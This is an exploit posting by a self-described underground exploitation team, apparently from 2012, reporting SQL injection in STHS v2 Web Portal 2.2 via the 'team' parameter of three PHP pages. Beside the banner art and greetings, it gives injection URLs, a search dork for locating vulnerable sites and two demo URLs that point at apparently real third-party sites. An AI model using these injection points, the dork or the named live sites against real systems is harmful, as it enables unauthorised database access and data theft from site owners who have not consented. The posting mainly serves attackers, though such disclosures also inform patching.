STHS v2 Web Portal version 2.2 suffers from a remote SQL injection vulnerability.
df2aef2b8ed5719432fab9d65d36c1e6976ddeece6ee659a2784031108fcd5bd
=================================================
STHS v2 Web Portal 2.2 SQL Injection Vulnerabilty
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3 3
3 ________ .__ ________ 3
7 \______ \ |__| ______/ __ \ ____ ____ _____ 7
1 | | \ | | / ___/\____ / _/ ___\ / _ \ / \ 1
3 | ` \| | \___ \ / / \ \___ ( <_> )| Y Y \ 3
3 /_______ /|__|/____ > /____/ /\ \___ > \____/ |__|_| / 3
7 \/ \/ \/ \/ \/ 7
1 1
3 >> The Underground Exploitation Team 3
3 3
7 7
1 [+] Site : http://www.Dis9.com 1
3 3
3 3
7 ########################################## 7
1 I'm Liyan Oz Member from 1337 DataBase 1
3 ########################################## 3
3 3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#
# AUthor : Liyan Oz
# Title : STHS v2 Web Portal 2.2 SQL Injection Vulnerabilty
# Vendor : http://www.simhl.net
# Date : 10/02/2012
# Risk : Normal
# Tested On : Backtrack Liyan Oz Edition
# Contact : ariestiyansyah.rizky@gmail.com
# Home : http://0nto.wordpress.com/
# Dork : "powered by SIMHL.net"
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#
# Exploit :
http://www.site.com/prospects.php?team=[SQLi]'
http://www.site.org/prospect.php?team=[SQLi]'
http://www.site.net/team.php?team=[SQLi]'
# Demo :
http://lnhs2.hostpo.net/prospect.php?team=1'
http://www.lchv.biz/prospects.php?team=17'
# Greetz to
========================================================================
# = My Lovely Junia Astri Damayanti =
#
# = Dis9 The Underground Exploitation Team [at] www.dis9.com =
#
# - Kedans Dz - Blackrootkit - Kalashinkov3 - KnockOut - Black-ID -
# - Kowalski Howard - 7h1nkz3r0 - ettack - Ackrootkit - ph0n7ric -
# - xi4ojin - Nimda - Killer - Dz - 2ext01 - Aoi Sora - X1 - brk -
#
# - Indonesian Backtrack Team , El N4ck0 , and all my friend ^_^ -
#=======================================================================